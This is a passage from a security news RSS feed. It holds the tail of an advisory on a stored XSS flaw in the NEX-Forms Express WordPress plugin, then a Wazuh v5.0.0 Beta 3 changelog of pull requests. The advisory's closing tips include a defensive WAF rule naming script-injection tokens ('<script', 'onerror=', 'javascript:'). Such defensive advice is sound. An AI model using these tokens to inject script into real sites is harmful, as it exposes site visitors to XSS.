same sanitization consistently across all field types — asymmetric handling creates exploitable edge cases</li></ul><p><strong>For site owners:</strong></p><ul><li>If you use NEX-Forms Express ≤ 9.1.10, update immediately to the patched version.</li><li>Monitor your form entries for unexpected HTML or JavaScript in field values</li><li>Consider a WAF rule blocking &lt;script, onerror=, and javascript: in form POST bodies</li></ul><p>Stay tune for more!!!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=e4bf33e67e82" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/unauthenticated-stored-xss-in-nex-forms-express-wp-form-builder-9-1-10-cvss-8-8-high-e4bf33e67e82">Unauthenticated Stored XSS in NEX-Forms Express WP Form Builder (≤ 9.1.10) — CVSS 8.8 High</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v5.0.0 Beta 3]]></title>
<description><![CDATA[What's Changed

Improve cluster file synchronization error handling by @TomasTurina in #36129
Update trojan signatures to avoid false positives on modern distros by @Miguevrgo in #35927
Improve cluster merged file parameter validation by @vikman90 in #36204
Create a backup of local_rules.xml duri...]]></description>
<link>https://tsecurity.de/de/3641637/it-security-tools/wazuh-v500-beta-3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641637/it-security-tools/wazuh-v500-beta-3/</guid>
<pubDate>Thu, 02 Jul 2026 17:49:41 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>Improve cluster file synchronization error handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4454599181" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36129/hovercard" href="https://github.com/wazuh/wazuh/pull/36129">#36129</a></li>
<li>Update trojan signatures to avoid false positives on modern distros by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390541461" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35927" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35927/hovercard" href="https://github.com/wazuh/wazuh/pull/35927">#35927</a></li>
<li>Improve cluster merged file parameter validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4476621950" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36204/hovercard" href="https://github.com/wazuh/wazuh/pull/36204">#36204</a></li>
<li>Create a backup of local_rules.xml during execution of IT analysisd tier 0 1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4475277385" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36201" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36201/hovercard" href="https://github.com/wazuh/wazuh/pull/36201">#36201</a></li>
<li>Improve tmp_file path validation in cluster DAPI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486930454" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36246" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36246/hovercard" href="https://github.com/wazuh/wazuh/pull/36246">#36246</a></li>
<li>Revert bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495350373" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36303" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36303/hovercard" href="https://github.com/wazuh/wazuh/pull/36303">#36303</a></li>
<li>Bump 4.14.7 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4496470145" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36312" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36312/hovercard" href="https://github.com/wazuh/wazuh/pull/36312">#36312</a></li>
<li>Serialize procps access to prevent modulesd crash by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4489581046" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36261" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36261/hovercard" href="https://github.com/wazuh/wazuh/pull/36261">#36261</a></li>
<li>Remove obsolete configuration blocks from API upload_configuration setting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487498848" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36252" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36252/hovercard" href="https://github.com/wazuh/wazuh/pull/36252">#36252</a></li>
<li>Restore working vulnerability scanner database workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502088595" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36332" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36332/hovercard" href="https://github.com/wazuh/wazuh/pull/36332">#36332</a></li>
<li>Propagate agent merged_sum after hot reload in cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468736412" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36164" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36164/hovercard" href="https://github.com/wazuh/wazuh/pull/36164">#36164</a></li>
<li>Merge 4.14.7 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4501542567" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36331" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36331/hovercard" href="https://github.com/wazuh/wazuh/pull/36331">#36331</a></li>
<li>Authd tier 0-1 flaky tests fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504446587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36342" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36342/hovercard" href="https://github.com/wazuh/wazuh/pull/36342">#36342</a></li>
<li>Review agent info logs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485038079" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36234" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36234/hovercard" href="https://github.com/wazuh/wazuh/pull/36234">#36234</a></li>
<li>Fix the wazuh-manager-modules crash that occurs while downloading the feed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503648565" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36337" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36337/hovercard" href="https://github.com/wazuh/wazuh/pull/36337">#36337</a></li>
<li>Migrate FIM DB path queries to parameterized statements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4517817292" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36399" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36399/hovercard" href="https://github.com/wazuh/wazuh/pull/36399">#36399</a></li>
<li>Fix AlmaLinux 9/10 bootloader permissions SCA check regex and optional file handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4515333133" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36396" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36396/hovercard" href="https://github.com/wazuh/wazuh/pull/36396">#36396</a></li>
<li>Cluster file processing parameter validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494129534" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36296" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36296/hovercard" href="https://github.com/wazuh/wazuh/pull/36296">#36296</a></li>
<li>Add missing 4.10.2-4.10.5 and 4.8.2 entries to changelogs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523024537" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36407" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36407/hovercard" href="https://github.com/wazuh/wazuh/pull/36407">#36407</a></li>
<li>Treat the absence of the hash document as expected, not an error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505113598" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36355" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36355/hovercard" href="https://github.com/wazuh/wazuh/pull/36355">#36355</a></li>
<li>geo_point validation support all compatible formats by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4423592068" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36034" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36034/hovercard" href="https://github.com/wazuh/wazuh/pull/36034">#36034</a></li>
<li>Prevent Syscollector and SCA use-after-free on modulesd shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505494861" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36359" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36359/hovercard" href="https://github.com/wazuh/wazuh/pull/36359">#36359</a></li>
<li>Add cluster security model and configuration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4522930141" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36405" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36405/hovercard" href="https://github.com/wazuh/wazuh/pull/36405">#36405</a></li>
<li>Bump CB_SCAN_STARTED timeout and trigger ITs on wm_syscollector.c by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4527847069" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36446" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36446/hovercard" href="https://github.com/wazuh/wazuh/pull/36446">#36446</a></li>
<li>Fixed an issue in eBPF with LSM hooks and improved the health check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359560869" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35838" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35838/hovercard" href="https://github.com/wazuh/wazuh/pull/35838">#35838</a></li>
<li>Validate cluster node name format by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531591190" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36460" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36460/hovercard" href="https://github.com/wazuh/wazuh/pull/36460">#36460</a></li>
<li>eBPF libraries updated by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533955405" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36467" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36467/hovercard" href="https://github.com/wazuh/wazuh/pull/36467">#36467</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539082172" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36517" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36517/hovercard" href="https://github.com/wazuh/wazuh/pull/36517">#36517</a></li>
<li>Revert "Bump 4.14.6 branch" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539151411" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36518" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36518/hovercard" href="https://github.com/wazuh/wazuh/pull/36518">#36518</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539251322" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36519" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36519/hovercard" href="https://github.com/wazuh/wazuh/pull/36519">#36519</a></li>
<li>Update changelog for 4.14.6 RC 1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539470693" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36562" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36562/hovercard" href="https://github.com/wazuh/wazuh/pull/36562">#36562</a></li>
<li>Fix policy evaluation errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528195977" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36449" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36449/hovercard" href="https://github.com/wazuh/wazuh/pull/36449">#36449</a></li>
<li>Release startup hash gate when the reload chain fails by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495215383" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36302" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36302/hovercard" href="https://github.com/wazuh/wazuh/pull/36302">#36302</a></li>
<li>Revert "Add missing 4.10.2-4.10.5 and 4.8.2 entries to changelogs" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541090106" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36591" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36591/hovercard" href="https://github.com/wazuh/wazuh/pull/36591">#36591</a></li>
<li>Merge merge-4.14.7-into-main into main [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4546876084" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36624" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36624/hovercard" href="https://github.com/wazuh/wazuh/pull/36624">#36624</a></li>
<li>Restore event counter and classify received messages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531260982" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36456" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36456/hovercard" href="https://github.com/wazuh/wazuh/pull/36456">#36456</a></li>
<li>Unify manager integration tests workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4485169588" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36235" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36235/hovercard" href="https://github.com/wazuh/wazuh/pull/36235">#36235</a></li>
<li>Remove unused Node.js 12 from arm64 deb agent builder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467836275" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36156" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36156/hovercard" href="https://github.com/wazuh/wazuh/pull/36156">#36156</a></li>
<li>Remove unused Node.js 12 from arm deb agent builders (4.14.7) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467837119" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36157" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36157/hovercard" href="https://github.com/wazuh/wazuh/pull/36157">#36157</a></li>
<li>SCA typo bug in SELinux SCA rule for CentOS 8/9/10 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514754415" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36361" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36361/hovercard" href="https://github.com/wazuh/wazuh/pull/36361">#36361</a></li>
<li>Fix <code>detect-changes</code> glob to honour <code>**</code> recursively and extract logic into a reusable action by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4544605284" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36617" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36617/hovercard" href="https://github.com/wazuh/wazuh/pull/36617">#36617</a></li>
<li>Merge merge-4.14.6-into-4.14.7 into 4.14.7 [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4546868343" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36623" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36623/hovercard" href="https://github.com/wazuh/wazuh/pull/36623">#36623</a></li>
<li>Reduce log noise when engine has no synchronized ruleset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505198128" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36356" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36356/hovercard" href="https://github.com/wazuh/wazuh/pull/36356">#36356</a></li>
<li>Update test modules paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4549542116" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36668" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36668/hovercard" href="https://github.com/wazuh/wazuh/pull/36668">#36668</a></li>
<li>Only download external deps when required by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4486894083" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36244" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36244/hovercard" href="https://github.com/wazuh/wazuh/pull/36244">#36244</a></li>
<li>Merge 4.14.7 into main by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4548874786" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36664" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36664/hovercard" href="https://github.com/wazuh/wazuh/pull/36664">#36664</a></li>
<li>Mail forwarding and reporting 5.0 migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ripdiegozz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ripdiegozz">@Ripdiegozz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505228985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36357" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36357/hovercard" href="https://github.com/wazuh/wazuh/pull/36357">#36357</a></li>
<li>Added Ubuntu 26.04's SCA policy in the SPECS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562694437" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36712" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36712/hovercard" href="https://github.com/wazuh/wazuh/pull/36712">#36712</a></li>
<li>Preliminary support new OSs - Ubuntu 26.04 - Add SCA content by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AwwalQuan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AwwalQuan">@AwwalQuan</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4561732273" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36708" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36708/hovercard" href="https://github.com/wazuh/wazuh/pull/36708">#36708</a></li>
<li>Safeguards to inventory sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534767894" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36469" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36469/hovercard" href="https://github.com/wazuh/wazuh/pull/36469">#36469</a></li>
